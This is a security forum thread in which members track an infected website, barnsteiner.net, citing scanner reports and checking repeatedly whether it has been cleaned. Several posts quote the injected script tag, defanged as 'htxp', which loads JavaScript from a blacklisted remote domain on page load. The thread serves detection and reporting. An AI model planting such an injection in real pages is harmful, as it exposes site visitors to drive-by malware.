Suspicious URL page detected?

[polonus]

9 hours ago: http://killmalware.com/barnsteiner.net/
Re:
Re: https://www.virustotal.com/nl/url/7edcd99d96bb1ba660b1288fb51daedce5a964099fddcffa22f0b98fdcc98cd7/analysis/1418484555/
Re: http://quttera.com/detailed_report/barnsteiner.net

Code: [Select]

[[<!--a03ada--><script type="text/javascript" src="htxp://box.traditionnutte.de/4gmrbbjy.php?id=89406"></script><!--/a03ada-->]]Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2
Blacklisted: http://yandex.com/infected?l10n=en&url=barnsteiner.net -> http://jsunpack.jeek.org/?report=a62bf0b22520f033fe882bcd91a1106d2a0c487b (for security reaearch only, open up with NoScript extension active and inside a VM/sandbox)

pol

[polonus]

This link htxp://box.traditionnutte.de/4gmrbbjy.php?id=89406 is going to local host like

Code: [Select]

RESPONSE BODY
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Access forbidden!</title>
<link rev="made" href="mailto:%5bno%20address%20given%5d" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>

<body>
<h1>Access forbidden!</h1>
<p>[code]

pol Apparently CRAN link broken: http://r.789695.n4.nabble.com/CRAN-link-broken-td4246941.html

[polonus]

Update - the infection continues: http://killmalware.com/barnsteiner.net/
The website has nott been cleansed since, so 15 days and counting.
index.html
Severity:   Malicious
Reason:   Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details:   Malicious obfuscated JavaScript threat
Offset:   846
Threat dump:   

[[<!--a03ada--><script type="text/javascript" src="htxp://box.traditionnutte.de/4gmrbbjy.php?id=89406"></script><!--/a03ada-->]] 

Threat dump MD5:   75E8A847369CE7A9558E7D308AB145EB
File size[byte]:   986
File type:   ASCII
Page/File MD5:   7B235BB67B5C88C69F0F16538F202324
Scan duration[sec]:   0.002000

Who is coming here to check the third party cold reconnaissance scanning I perform?

polonus

[Pondus]

Who is coming here to check the third party cold reconnaissance scanning I perform?

only me i guess   

avast got it
https://www.virustotal.com/nb/file/042fdc0723866ef45a3db12cf60d6d6df78002a180dcb00b888635591eb3a382/analysis/1427129532/

[polonus]

Hi Pondus,

It is time for your medal then.     
You receive this medal  for constantly back-checking on all sort of results I posted.
See it attached.

polonus

[polonus]

Update: See: http://killmalware.com/barnsteiner.net/#  and https://www.virustotal.com/nl/url/7edcd99d96bb1ba660b1288fb51daedce5a964099fddcffa22f0b98fdcc98cd7/analysis/#additional-info
ndex.html
Severity:   Malicious
Reason:   Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details:   Malicious obfuscated JavaScript threat
Website blacklisted; http://www.yandex.com/infected?url=barnsteiner.net&l10n=en
Suspicious javascript check: Suspicious

ner.net</h1></div><!--a03ada--><script type="text/javascript" src="htxp://box.traditionnutte.de/4gmrbbjy.php?id=89406"></script><!--/a03ada-

Included script check: Suspect - please check list for unknown includes

htxp://box.traditionnutte.de/4gmrbbjy.php?id=89406
Read: http://javascript.crockford.com/script.html

See this report:  https://rateip.com/ipv4/78.47.15.68
Consider: http://www.das-labor.org/svn/microcontroller-2/arm-crypto-lib/testvectors/rsa-pkcs-1v2-1-vec/pss-vect.txt

polonus

[Pondus]

barnsteiner.net.htm
https://www.virustotal.com/nb/file/042fdc0723866ef45a3db12cf60d6d6df78002a180dcb00b888635591eb3a382/analysis/1427836968/

[polonus]

Update,

As yet website has not been cleansed: http://killmalware.com/barnsteiner.net/#
Netcraft website report status: 7 red out of 10: http://toolbar.netcraft.com/site_report?url=http://barnsteiner.net

polonus